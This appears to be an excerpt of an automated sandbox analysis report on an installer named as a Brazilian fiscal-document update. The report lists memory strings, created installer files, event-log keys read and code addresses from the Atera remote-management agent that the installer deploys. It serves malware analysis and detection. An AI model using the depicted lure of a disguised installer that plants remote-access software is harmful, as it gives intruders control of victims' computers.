Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: https://www.digicert.com/CPS0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.jetbrains.com/help/teamcity/2024.12/teamcity-2024-12-release-notes.html
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.jetbrains.com/teamcity/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.jetbrains.com/teamcity/buy/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.jetbrains.com/teamcity/documentation/
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2455163364.0000028A32100000.00000002.00000001.01000000.00000029.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2219739634.00000247F8C28000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: https://www.nuget.org/packages/NLog.Web.AspNetCore
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2037318779.0000028A55B72000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2219808571.00000247F8C32000.00000002.00000001.01000000.00000024.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2455163364.0000028A32100000.00000002.00000001.01000000.00000029.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.oracle.com/technetwork/java/javase/8all-relnotes-2226344.html
Source: AgentPackageMonitoring.exe	String found in binary or memory: https://www.sqlite.org/copyright.html
Source: AgentPackageMonitoring.exe, 00000024.00000002.2232390531.00007FFDF1024000.00000002.00000001.01000000.0000001C.sdmp, SQLite.Interop.dll.14.dr	String found in binary or memory: https://www.sqlite.org/copyright.html2
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtrack.jetbrains.com/issues/TW

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1	Jump to dropped file
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944	Jump to dropped file
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141	Jump to dropped file
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4	Jump to dropped file
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB	Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\AteraAgent
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\AlphaAgent
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\AteraAgent
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\AteraAgent
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\57a754.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA89C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIAB6C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC6C5.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC8BA.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC8CB.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC958.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICAA2.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\57a756.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\57a756.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE7A0.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\57a757.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEE25.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIF48E.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1C6A.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2247.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2248.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI22C6.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2315.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI39FA.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI39FB.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3AC7.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3B35.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\57a763.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\57a763.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3FAB.tmp	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIA89C.tmp-	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIA89C.tmp-\AlphaControlAgentInstallation.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIA89C.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIA89C.tmp-\Newtonsoft.Json.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIA89C.tmp-\System.Management.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIA89C.tmp-\CustomAction.config	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIAB6C.tmp-	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIAB6C.tmp-\AlphaControlAgentInstallation.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIAB6C.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIAB6C.tmp-\Newtonsoft.Json.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIAB6C.tmp-\System.Management.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIAB6C.tmp-\CustomAction.config	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIC6C5.tmp-	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIC6C5.tmp-\AlphaControlAgentInstallation.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIC6C5.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIC6C5.tmp-\Newtonsoft.Json.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIC6C5.tmp-\System.Management.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIC6C5.tmp-\CustomAction.config	Jump to behavior
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\system32\InstallUtil.InstallLog
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIE7A0.tmp-
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIE7A0.tmp-\AlphaControlAgentInstallation.dll
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIE7A0.tmp-\Microsoft.Deployment.WindowsInstaller.dll
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIE7A0.tmp-\Newtonsoft.Json.dll
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIE7A0.tmp-\System.Management.dll
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIE7A0.tmp-\CustomAction.config
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMonitoring.exe.log
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageUpgradeAgent.exe.log
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageHeartbeat.exe.log
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIEE25.tmp-
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIEE25.tmp-\AlphaControlAgentInstallation.dll
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIEE25.tmp-\Microsoft.Deployment.WindowsInstaller.dll
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIEE25.tmp-\Newtonsoft.Json.dll
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIEE25.tmp-\System.Management.dll
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIEE25.tmp-\CustomAction.config
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIF48E.tmp-
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIF48E.tmp-\AlphaControlAgentInstallation.dll
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIF48E.tmp-\Microsoft.Deployment.WindowsInstaller.dll
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIF48E.tmp-\Newtonsoft.Json.dll
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIF48E.tmp-\System.Management.dll
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\Installer\MSIF48E.tmp-\CustomAction.config

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIA89C.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_3_06E80040	4_3_06E80040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_3_049750B8	5_3_049750B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_3_049759A8	5_3_049759A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_3_04974D68	5_3_04974D68
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 12_2_00007FFD9B63C922	12_2_00007FFD9B63C922
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 12_2_00007FFD9B63BB76	12_2_00007FFD9B63BB76
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 14_2_00007FFD9B61CFB8	14_2_00007FFD9B61CFB8
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 14_2_00007FFD9B619AF2	14_2_00007FFD9B619AF2
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 14_2_00007FFD9B621CF0	14_2_00007FFD9B621CF0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 14_2_00007FFD9B821FDB	14_2_00007FFD9B821FDB
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 14_2_00007FFD9B822D70	14_2_00007FFD9B822D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_3_04937678	17_3_04937678
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_3_04930040	17_3_04930040
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B6211BD	20_2_00007FFD9B6211BD
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B611953	20_2_00007FFD9B611953
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B617956	20_2_00007FFD9B617956
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B622118	20_2_00007FFD9B622118
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B618702	20_2_00007FFD9B618702
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B63057D	20_2_00007FFD9B63057D
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B6112FB	20_2_00007FFD9B6112FB
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B6211D3	20_2_00007FFD9B6211D3
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B61BF80	20_2_00007FFD9B61BF80
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B620ED8	20_2_00007FFD9B620ED8
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B6116FA	20_2_00007FFD9B6116FA
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B620E3C	20_2_00007FFD9B620E3C
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 22_2_00007FFD9B621953	22_2_00007FFD9B621953
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 22_2_00007FFD9B6212FA	22_2_00007FFD9B6212FA
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 22_2_00007FFD9B6216FA	22_2_00007FFD9B6216FA
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B631D8B	24_2_00007FFD9B631D8B
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B629DFB	24_2_00007FFD9B629DFB
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B639436	24_2_00007FFD9B639436
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B629EDF	24_2_00007FFD9B629EDF
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B848C30	24_2_00007FFD9B848C30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B848BA8	24_2_00007FFD9B848BA8
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B837F2C	24_2_00007FFD9B837F2C
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B836340	24_2_00007FFD9B836340
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B848298	24_2_00007FFD9B848298
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B847582	24_2_00007FFD9B847582
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B6012FB	27_2_00007FFD9B6012FB
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B608976	27_2_00007FFD9B608976
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B60D1DD	27_2_00007FFD9B60D1DD
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B610EB3	27_2_00007FFD9B610EB3
